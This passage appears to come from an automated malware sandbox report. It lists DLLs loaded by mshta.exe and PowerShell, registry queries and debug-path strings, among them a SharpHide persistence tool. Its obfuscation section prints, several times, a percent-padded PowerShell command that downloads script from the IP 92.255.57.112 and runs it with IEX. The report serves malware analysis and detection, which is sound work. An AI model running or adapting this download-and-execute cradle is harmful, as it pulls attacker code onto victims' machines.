                  Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: \??\C:\Windows\System.Core.pdbpdbcr source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb91b8c6 source: powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbl source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbsM source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdbFiles source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbgz source: powershell.exe, 00000004.00000002.58389738530.0000015EAAF2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAF2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdb=C:\P source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.58452952666.0000025BB01EF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb 158 Stepping 13, GenuineIntelPROCES source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb[ source: powershell.exe, 00000006.00000002.58452952666.0000025BB01DD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Y]xn.pdb source: powershell.exe, 00000008.00000002.58462627995.00000199FF735000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: #.dll.pdb source: powershell.exe, 00000004.00000002.58302816703.0000015E92C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58398618045.0000015EAB270000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.58310832394.0000025B97E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58308550972.00000199803D4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdbO source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAF2D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF4CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbo source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdbP source: powershell.exe, 00000008.00000002.58462627995.00000199FF735000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbP source: powershell.exe, 00000008.00000002.58457730531.00000199FF4CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb( source: powershell.exe, 00000008.00000002.58457730531.00000199FF4CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb+$m source: powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbO$I source: powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbam F( source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb4 source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58451615184.0000025BAFF33000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF720000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbuo source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000006.00000002.58452952666.0000025BB01BB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32ersion=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFAE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF7D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58457730531.00000199FF430000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000008.00000002.58457730531.00000199FF430000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.58300790959.0000015E90C18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58451615184.0000025BAFF33000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF79C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF720000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbwA source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbs source: powershell.exe, 00000008.00000002.58457730531.00000199FF4CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dows\System.Core.pdb source: powershell.exe, 00000008.00000002.58457730531.00000199FF430000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbe source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdbOlC source: powershell.exe, 00000006.00000002.58452952666.0000025BB021E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \SharpHide-master\SharpHide\obj\Debug\SharpHide.pdb source: powershell.exe, 00000004.00000002.58302816703.0000015E92C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.58302816703.0000015E92D73000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.58296660265.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.58300790959.0000015E90C18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.58451615184.0000025BAFF33000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.58462627995.00000199FF720000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.58389738530.0000015EAAFCA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbL source: powershell.exe, 00000006.00000002.58452952666.0000025BB0288000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
